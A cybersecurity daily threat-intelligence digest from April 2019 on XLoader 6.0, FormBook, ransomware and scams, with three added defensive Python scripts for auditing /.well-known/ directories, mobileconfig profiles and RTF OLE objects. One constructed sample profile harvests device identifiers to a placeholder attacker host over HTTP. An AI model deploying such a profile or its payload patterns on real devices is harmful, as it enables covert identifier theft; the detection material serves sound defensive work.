Cyware Daily Threat Intelligence, April 03, 2019

Cybercriminals are actively disguising malware as legitimate apps to steal sensitive data and carry out other malicious activity. In a recent incident, security researchers detected a new version of the XLoader spyware that poses as fake banking apps to spread to Android devices. Dubbed XLoader 6.0, the spyware does not spare iPhone users either: it uses a malicious iOS profile to infect iPhones and iPads. Once installed, the malware can exfiltrate device identifiers such as the Unique Device Identifier (UDID), International Mobile Equipment Identity (IMEI), Integrated Circuit Card ID (ICCID), Mobile Equipment Identifier (MEID), version number and product number.

The past 24 hours also saw the emergence of a massive email spam campaign that harvested more than five million unique credentials. The campaign ran between March 8 and March 18, 2019, with spammers sending phishing emails that linked to fake sites promoting a weight-loss pill or a bitcoin scam. It was detected after security researchers came across a poorly configured database holding the stolen credentials.

New details about the ransomware attack on Arizona Beverages have surfaced. The beverage supplier, which suffered the attack last month, is still working to restore its computers and servers. The attack affected more than 200 servers and networked computers, leaving the company little chance of recovering the lost data.

Top Breaches Reported in the Last 24 Hours

Arizona Beverages hit by iEncrypt ransomware
Arizona Beverages, one of the largest beverage suppliers in the US, saw its operations slow down after it was hit by iEncrypt ransomware in March. The attack affected more than 200 servers and networked computers, and the company shut down its sales operations for days. With no usable backups available, the company is finding it hard to restore its systems and is still rebuilding its network almost two weeks after the attack.

Iranian hackers attack UK organizations
A new report has revealed that Iranian hackers were behind the attacks carried out against the UK Post Office and local government networks on December 23, 2018. The attacks exposed the personal details of thousands of employees. Further analysis indicates that these hackers are already targeting government agencies to gather intelligence and position themselves for future cyber operations.

Compromised HTTPS sites used to store malware
Cybercriminals are using the hidden /.well-known/ directories of HTTPS sites, which are normally used for certificate validation, to store and serve malicious payloads. In one such instance, compromised WordPress and Joomla websites were found spreading the Shade/Troldesh ransomware, coin miners, backdoors, redirectors, phishing pages and other threats. The attackers reportedly gained access to these sites through outdated plugins and themes.
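
Because /.well-known/ is only supposed to hold certificate-validation artifacts (ACME challenge tokens under acme-challenge, validation text files under pki-validation), anything else in it is worth a look. The script below is an added example, not code from the original report or from WordPress or Joomla: it walks a site's .well-known tree, flags files by magic bytes (PE, ZIP, ELF, PHP, shebang scripts) and reports names under the two validation directories that do not fit their expected shape. The webroot it audits is a constructed temporary tree with both legitimate and planted files; the token and file names in it are invented for the example.

```python
import os
import re
import tempfile

# RFC 8555 challenge tokens are base64url without padding and carry at least
# 128 bits of entropy, so a genuine ACME challenge file name looks like this.
ACME_TOKEN = re.compile(r"^[A-Za-z0-9_-]{22,}$")

# File signatures that have no business under /.well-known/ at all.
MAGIC = [
    (b"MZ", "Windows executable"),
    (b"PK\x03\x04", "ZIP archive"),
    (b"\x7fELF", "ELF binary"),
    (b"<?php", "PHP script"),
    (b"#!", "script with shebang"),
]


def classify(path):
    """Return a label when the file's first bytes match a known payload type."""
    with open(path, "rb") as fh:
        head = fh.read(8)
    for magic, label in MAGIC:
        if head.startswith(magic):
            return label
    return None


def audit_well_known(webroot):
    """Walk <webroot>/.well-known and return sorted (relative_path, reason) pairs."""
    findings = []
    base = os.path.join(webroot, ".well-known")
    for dirpath, _dirs, files in os.walk(base):
        subdir = os.path.relpath(dirpath, base)
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, webroot).replace(os.sep, "/")
            label = classify(path)
            if label:
                findings.append((rel, label))
            elif subdir == "acme-challenge" and not ACME_TOKEN.match(name):
                findings.append((rel, "file name is not an ACME challenge token"))
            elif subdir == "pki-validation" and not name.lower().endswith(".txt"):
                findings.append((rel, "unexpected file under pki-validation"))
    return sorted(findings)


def build_sample_tree():
    """Create a constructed webroot (legitimate plus planted files); return its path."""
    root = tempfile.mkdtemp(prefix="wk-audit-")
    samples = {
        # Legitimate: an ACME challenge token and a pki-validation text file.
        ".well-known/acme-challenge/gH7_QdR3kLm9x2vB0pWe-1aZ": b"gH7_QdR3kLm9x2vB0pWe-1aZ.thumbprint",
        ".well-known/pki-validation/fileauth.txt": b"0123456789abcdef\n",
        # Planted: a redirector page, an executable, an archive and a PHP file.
        ".well-known/acme-challenge/index.html": b"<html><body>redirect</body></html>",
        ".well-known/acme-challenge/update.exe": b"MZ\x90\x00" + b"\x00" * 60,
        ".well-known/pki-validation/loader.zip": b"PK\x03\x04" + b"\x00" * 26,
        ".well-known/shell.php": b"<?php // planted script\n",
    }
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, reason in audit_well_known(build_sample_tree()):
        print("%-45s %s" % (rel, reason))
```

Run it against a real document root by calling audit_well_known("/var/www/html") (path assumed); pair it with a check of the web server's access log for GET requests to the flagged paths, since the same sites were serving the payloads, not just storing them.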

Top Malware Reported in the Last 24 Hours

XLoader 6.0
Security researchers have discovered a new variant of the XLoader spyware that infects both Android and iOS users. The variant, XLoader 6.0, disguises itself as a fake banking app to infect Android phones and uses a fake iOS profile to target iPhones and iPads. XLoader 6.0 collects device information such as the Unique Device Identifier (UDID), International Mobile Equipment Identity (IMEI), Integrated Circuit Card ID (ICCID), Mobile Equipment Identifier (MEID), version number and product number.
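
The identifier list above (UDID, IMEI, ICCID, MEID, version, product) is exactly the set an Apple "Profile Service" payload can ask a device to report during over-the-air enrollment, which is how a profile that the user merely taps "Install" on can harvest them. The following is an added example, not code from the original report or from Apple: it parses a plaintext .mobileconfig with the standard library, lists the identifiers a Profile Service payload requests, checks where and over what transport they would be sent, and, for ordinary configuration profiles, reports payloads that change trust or routing on the device. The sample profile, its host name and its UUID are constructed for the example, not taken from XLoader; the trusted-host list is an assumed allowlist of real MDM enrollment hosts.

```python
import plistlib
from urllib.parse import urlparse

# Attributes a "Profile Service" payload can ask the device to report. Apple
# documents UDID, IMEI, ICCID, VERSION and PRODUCT; MEID is added because the
# XLoader 6.0 write-up lists it among the harvested values.
IDENTIFIER_ATTRIBUTES = {"UDID", "IMEI", "ICCID", "MEID", "VERSION", "PRODUCT"}

# Configuration-profile payload types that deserve a second look on their own:
# a root CA plus a VPN or global proxy is the classic interception setup.
RISKY_PAYLOAD_TYPES = {
    "com.apple.security.root": "installs a root CA certificate",
    "com.apple.vpn.managed": "installs a VPN configuration",
    "com.apple.proxy.http.global": "sets a global HTTP proxy",
    "com.apple.webClip.managed": "adds a web clip to the home screen",
}

# Constructed sample for this example (not a real XLoader profile): a Profile
# Service payload that asks for every identifier and posts them, over plain
# HTTP, to a placeholder host.
SAMPLE_PROFILE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>PayloadType</key><string>Profile Service</string>
  <key>PayloadIdentifier</key><string>com.example-bank.security</string>
  <key>PayloadUUID</key><string>3A4C7E0E-1B9D-4F1A-9B5E-0F0F0F0F0F0F</string>
  <key>PayloadVersion</key><integer>1</integer>
  <key>PayloadDisplayName</key><string>Example Bank Security Update</string>
  <key>PayloadOrganization</key><string>Example Bank</string>
  <key>PayloadContent</key>
  <dict>
    <key>URL</key><string>http://profile.example-attacker.invalid/collect</string>
    <key>DeviceAttributes</key>
    <array>
      <string>UDID</string><string>IMEI</string><string>ICCID</string>
      <string>MEID</string><string>VERSION</string><string>PRODUCT</string>
    </array>
  </dict>
</dict>
</plist>
"""


def triage_profile(data, trusted_hosts=()):
    """Return (requested_identifiers, findings) for a .mobileconfig.

    requested_identifiers: sorted DeviceAttributes the profile asks for.
    findings: reasons a reviewer should refuse the profile or escalate.
    trusted_hosts: enrollment hosts that are allowed to receive identifiers.
    """
    if data.lstrip().startswith(b"\x30"):
        # DER SEQUENCE: a CMS-signed profile. plistlib cannot read it; verify
        # the signature and extract the inner plist before triage.
        return [], ["profile is CMS-wrapped (signed); extract the inner plist first"]

    profile = plistlib.loads(data)
    content = profile.get("PayloadContent")
    findings = []
    requested = []

    if profile.get("PayloadType") == "Profile Service" and isinstance(content, dict):
        # Over-the-air enrollment, phase 1: the device POSTs the listed
        # attributes to URL. Genuine MDM enrollment uses the same mechanism,
        # so the destination and the transport decide whether it is acceptable.
        requested = sorted(set(content.get("DeviceAttributes", [])) & IDENTIFIER_ATTRIBUTES)
        if requested:
            findings.append("requests device identifiers: " + ", ".join(requested))
        url = urlparse(content.get("URL", ""))
        if url.scheme != "https":
            findings.append("identifiers would be sent over %s, not HTTPS" % (url.scheme or "no scheme"))
        if url.hostname not in trusted_hosts:
            findings.append("destination %r is not an approved enrollment host" % url.hostname)
    elif isinstance(content, list):
        # Ordinary configuration profile: report each payload that changes
        # trust or routing on the device.
        for payload in content:
            reason = RISKY_PAYLOAD_TYPES.get(payload.get("PayloadType", ""))
            if reason:
                findings.append("%s payload %s" % (payload.get("PayloadType"), reason))
    return requested, findings


if __name__ == "__main__":
    ids, notes = triage_profile(SAMPLE_PROFILE, trusted_hosts=("mdm.example-bank.invalid",))
    print("requested identifiers:", ids)
    for note in notes:
        print("-", note)
```

The same check is useful on the defensive side of an MDM rollout: a legitimate enrollment profile should request only the attributes the MDM needs and send them over HTTPS to a host on the allowlist, and it should be signed, which is why the CMS-wrapped case is treated as "verify first" rather than parsed blindly.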

A massive email spam campaign
A team of researchers has discovered a misconfigured database containing over 5 million unique credentials. The database was left open to the public by the hackers, without any password protection. The hackers behind the campaign are believed to have harvested the credentials from UK-based users between March 8 and March 18, 2019.

FormBook malware
Bad actors have been caught using a new file hosting service to deliver the FormBook info-stealer and other malware. The infection chain begins with a phishing email carrying a malicious attachment: an RTF document that exploits two vulnerabilities, one in Microsoft ActiveX and one in the Equation Editor. When the RTF document is opened, it retrieves the FormBook payload from a website hosting the malware.

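
The RTF stage of that chain is where a mail gateway or an analyst can intervene, because the embedded OLE objects are visible in the RTF text before any exploit runs. The script below is an added example, not code from the original report or from any vendor: it splits an RTF byte string into its \object groups, reads each \objclass, hex-decodes the \objdata body and reports whether the object updates itself on open and whether its native data wraps a compound file. The sample document is constructed for the example and contains no exploit; the flagged class names (Equation.3 for the Equation Editor, Package for OLE packages) are the standard ones. ActiveX-based objects appear under other class names and are listed but not rated.

```python
import binascii
import re

# Microsoft Compound File (OLE2) header; the native data of an embedded
# object normally starts with it.
CFB_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")

# Object classes that are a red flag on their own in an inbound document.
HIGH_RISK_CLASSES = {
    "equation.3": "Equation Editor object (EQNEDT32.EXE)",
    "package": "OLE Package (drops an embedded file to %TEMP%)",
}

OBJECT_RE = re.compile(rb"\\object\b")
OBJCLASS_RE = re.compile(rb"\\objclass\s*([A-Za-z0-9._]+)")
OBJDATA_RE = re.compile(rb"\\objdata\s*((?:[0-9A-Fa-f]|\s)+)")

# Constructed sample (not a real exploit document): an auto-updating
# Equation.3 object whose OLE1 header wraps a compound-file header, followed
# by a Package object with a few bytes of filler as its payload.
SAMPLE_RTF = (
    b"{\\rtf1\\ansi\\deff0\n"
    b"{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}"
    b"{\\*\\objdata 01050000 02000000 0b000000 457175617469 6f6e2e3300\n"
    b"00000000 00000000 20000000 d0cf11e0 a1b11ae1 00000000 00000000\n"
    b"00000000 00000000 00000000 00000000}}\n"
    b"{\\object\\objemb{\\*\\objclass Package}"
    b"{\\*\\objdata 01050000 02000000 08000000 5061636b 61676500\n"
    b"00000000 00000000 04000000 41414141}}\n"
    b"}\n"
)


def decode_objdata(hexblob):
    """Hex-decode an \\objdata body, tolerating whitespace and a dangling nibble."""
    cleaned = re.sub(rb"\s+", b"", hexblob)
    if len(cleaned) % 2:
        cleaned = cleaned[:-1]
    return binascii.unhexlify(cleaned)


def scan_rtf(data):
    """Return one finding dict per \\object group in an RTF byte string."""
    starts = [m.start() for m in OBJECT_RE.finditer(data)]
    findings = []
    for i, start in enumerate(starts):
        # Each object is examined from its \object keyword up to the next one.
        end = starts[i + 1] if i + 1 < len(starts) else len(data)
        segment = data[start:end]
        cls_match = OBJCLASS_RE.search(segment)
        objclass = cls_match.group(1).decode("ascii", "replace") if cls_match else None
        data_match = OBJDATA_RE.search(segment)
        native = decode_objdata(data_match.group(1)) if data_match else b""
        findings.append({
            "objclass": objclass,
            # \objupdate makes Word refresh the object on open, a common
            # trigger for objects that need no user interaction.
            "auto_update": b"\\objupdate" in segment,
            "embedded_cfb": CFB_MAGIC in native,
            "native_size": len(native),
            "risk": HIGH_RISK_CLASSES.get((objclass or "").lower()),
        })
    return findings


if __name__ == "__main__":
    for finding in scan_rtf(SAMPLE_RTF):
        print(finding)
```

Treat any hit on Equation.3 in inbound mail as a block, whether or not the Equation Editor has been removed from the endpoints; for everything else the output is a triage list, since heavily obfuscated RTFs can hide the class name in ways a regex will not catch.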
Top Vulnerabilities Reported in the Last 24 Hours

Vulnerable Vidimensio’s GPS watches
A security lapse has exposed thousands of Vidimensio GPS watches to eavesdropping. The flaw lies in a poorly configured API shared by over 20 models of the watches. It could allow threat actors to eavesdrop on users, track their locations, alter data stored on the API server and issue commands to the watches. Vidimensio was notified about the issue in December 2017 but did not fix it until April 2018.

PoC for unpatched IE and Edge Web browsers released
A researcher has released a proof-of-concept (PoC) for an unpatched bypass vulnerability affecting Microsoft's Internet Explorer and Edge web browsers. A malicious website opened in either browser can exploit the flaw to collect potentially sensitive information from other sites, including cookies, session IDs, usernames, passwords and OAuth tokens.

Updates for tiff released
Security updates have been released for vulnerabilities in the tiff (libtiff) package. The vulnerabilities are tracked as CVE-2016-5102 (a buffer overflow) and CVE-2019-6128 (a memory corruption bug). Affected users are advised to use the SUSE-recommended installation methods, YaST online_update or 'zypper patch', or to run the command listed for their respective product.

Top Scams Reported in the Last 24 Hours

CIA extortion scam
A new variant of the CIA extortion scam has been spotted in the wild. The scam begins with an email purporting to come from a CIA officer. It states that the recipient is part of an investigation linked to pornography and that their details can be wiped from the case files only by paying a fee. The victim is asked to open a password-protected PDF attached to the email; once opened, it prompts the recipient to enter the password given in the email and then to send $5,000 to the enclosed bitcoin address.


Posted on: April 03, 2019